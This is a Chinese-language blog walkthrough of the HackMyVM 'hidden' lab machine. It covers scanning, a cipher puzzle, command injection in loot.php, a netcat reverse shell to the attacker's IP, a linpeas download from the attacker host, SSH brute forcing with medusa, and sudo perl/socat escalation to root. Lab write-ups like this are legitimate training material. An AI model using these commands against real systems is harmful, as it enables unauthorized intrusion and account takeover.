freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

记一次hackmyvm综合靶场的渗透测试-hidden
知非 2022-04-08 06:44:05 125776
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

KALI攻击机地址:192.168.1.128

靶机地址:192.168.1.5

目标:root.txt和user.txt

nmap -A -p- 192.168.1.5

1649371017_624f678901fae7bf1fa26.png!small?1649371018066

开启了22端口和80端口!!访问下80端口!!

http://192.168.1.5/

1649371030_624f6796bb63c31ec28f5.png!small?1649371031755

漏洞利用阶段

再查看一下源代码:

1649371036_624f679c1668868e2b2b0.png!small?1649371037109

这是一个格式,像是一个域名!!

上面那个图是猪圈密码的变种!

这里感谢:这位同学的技术支持!

1649371045_624f67a5831beda12dd66.png!small?1649371046526

密码表在下面!

1649371053_624f67adcde8aef2d1840.png!small?1649371054818

根据密码表破解密码!!!

得出:SYSHIDDENHMV

根据源代码的格式修改密码:得出->sys.hidden.hmv

这里我们修改下kali的/etc/hosts下的文件:

1649371061_624f67b5a8d3c8ce54905.png!small?1649371062737

访问下:我们看到第二关:

http://sys.hidden.hmv/

1649371094_624f67d69d2b75ec58021.png!small?1649371095658

接着,我们坐下这个域名下的目录扫描:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sys.hidden.hmv/ -x txt,php,html,log,zip

1649371110_624f67e61d0041811d8be.png!small?1649371111156

第一个地址:

http://sys.hidden.hmv/users/

1649371134_624f67fede001691300ad.png!small?1649371135917

1649371141_624f680563862609dc2fc.png!small?1649371142427

$ sudo apt-get install windows10 -y

好像没啥用!

第二个地址:

http://sys.hidden.hmv/members/

1649371150_624f680e12e2afa3c90a0.png!small?1649371151079

http://sys.hidden.hmv/members/7573185_0.webp

1649371155_624f68138275c13268d90.png!small?1649371156527

第三个地址:状态码是301,重定向,并且是白屏,下面应该还有东西!

接着下一重目录扫描!

http://sys.hidden.hmv/weapon/

1649371162_624f681a0930b5114d036.png!small?1649371163044

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sys.hidden.hmv/weapon/ -x txt,php,html,log,zip

1649371185_624f6831ec8569191b3c8.png!small?1649371187001

访问:这个地址,又是白屏!根据loot和tool推断有命令执行漏洞,我们FUZZ一下参数!

http://sys.hidden.hmv/weapon/loot.php

这里我们采用WFUZZ:

wfuzz -t 500 -c --hh=0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://sys.hidden.hmv/weapon/loot.php?FUZZ=id

我们这个wfuzz参数的意义:

-t N: Specify the number of concurrent connections (10 default)

指定并行链接的数量:

-c: Output with colors

输出信息带有颜色

--hh N[,N]+: Hide responses with the specified chars (Use BBB for taking values from baseline)

隐藏指定字符的响应信息

-w:指定字典

1649371201_624f6841ae0d35c867d72.png!small?1649371202826

访问链接:http://sys.hidden.hmv/weapon/loot.php?hack=id

1649371208_624f6848a0cd5e7ceb346.png!small?1649371209659

当前用户是www-data!

这里我们在命令执行中加入反弹bash的命令!并在kali上进行监听!

http://sys.hidden.hmv/weapon/loot.php?hack=nc 192.168.1.128 4444 -e /bin/bash

nc -lvvp 4444

-c shell commands:as `-e'; use /bin/sh to exec [dangerous!!]

-e filename      :program to exec after connect [dangerous!!]

程序连接后执行命令

1649371216_624f68502ee3565329603.png!small?1649371217157

这里反弹后的shell很多命令都不回显,所以我们搞个python的shell!

python3 -c 'import pty;pty.spawn("/bin/bash")'

1649371221_624f6855e898d11400050.png!small?1649371222980

1649371226_624f685a471fe51e993f3.png!small?1649371227323

权限提升阶段

我天,3重提权!!!

suid和sudo -l走起!!!

1649371231_624f685fb4b4887dc3891.png!small?1649371232833

运行下,看看/usr/bin/perl -h

1649371237_624f6865738106ad09023.png!small?1649371238519

这个命令可以直接反弹到文件所属用户toreto账户的shell!而且不用密码!当然也没有密码!

大佬的提权WP:

1649371243_624f686b0e0dce0b58be2.png!small?1649371244085

翻一下:

如果二进制程序允许通过sudo命令被超级管理员运行。它不能放弃提升的权限和也许被用作进入文件系统,扩大化或维持权限接入!

sudo -u toreto /usr/bin/perl -e 'exec "/bin/sh";'

1649371248_624f68708924f36861a09.png!small?1649371249560

还有两个账户:

1649371258_624f687a10103e4dd2750.png!small?1649371259125

这里直接上传linpeas.sh文件!看看扫描下!

1649371312_624f68b0847e5ee438e34.png!small?1649371313539

cd /tmp

wget http://192.168.1.128:8000/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

这个东西有点意思,看看文件!

1649371317_624f68b5c93baf3347bea.png!small?1649371318831

这是atenea账户的密码表吗?下载下来看看!

1649371322_624f68badd3db52d6eae4.png!small?1649371323973

1649371328_624f68c0afab965ddd92a.png!small?1649371329786

1649371333_624f68c5ef72b3ccf081c.png!small?1649371334993

这里我们采用medusa进行暴力破解下!

medusa -h 192.168.1.5 -u atenea -P atenea.txt -M ssh -f -t 10 -O hidden.txt

破解成功:

User: atenea Password: sys8423hmv

1649371339_624f68cbb2dfe7eb1702b.png!small?1649371340793

SSH登录成功:

1649371344_624f68d05140e57de3a2e.png!small?1649371345391

第一个flag:

cat user.txt

hmv{c4Hq**************pTL}

接下来,就需要提权到root了!

查一下sudo -l权限!!!

1649371359_624f68dfd16e3167d1786.png!small?1649371360850

大佬的提权WP:

1649371365_624f68e51f11c1886c461.png!small?1649371366137

翻一下:如果二进制程序允许通过sudo命令被超级管理员运行。它不能放弃提升的权限和也许被用作进入文件系统,扩大化或维持权限接入!

我们先看下,这个命令有啥功能!

1649371371_624f68eb930dadb8c96ee.png!small?1649371372702

sudo -u root /usr/bin/socat stdin exec:/bin/sh

1649371379_624f68f35ac0fefd49f3f.png!small?1649371380373

root的flag!!

hmv{2M*****************B6}

# 渗透测试 # 网络安全 # web安全 # CTF # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 知非 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hackmyvm靶场实战
知非 LV.8
这家伙太懒了,还未填写个人描述!
  • 125 文章数
  • 40 关注者
一个月学习通过商用密码测评师的经验分享
2025-01-09
等保2.0之AIX安全计算环境测评指导书
2023-05-10
记一次hackmyvm综合靶场的渗透测试-warez
2022-04-27
文章目录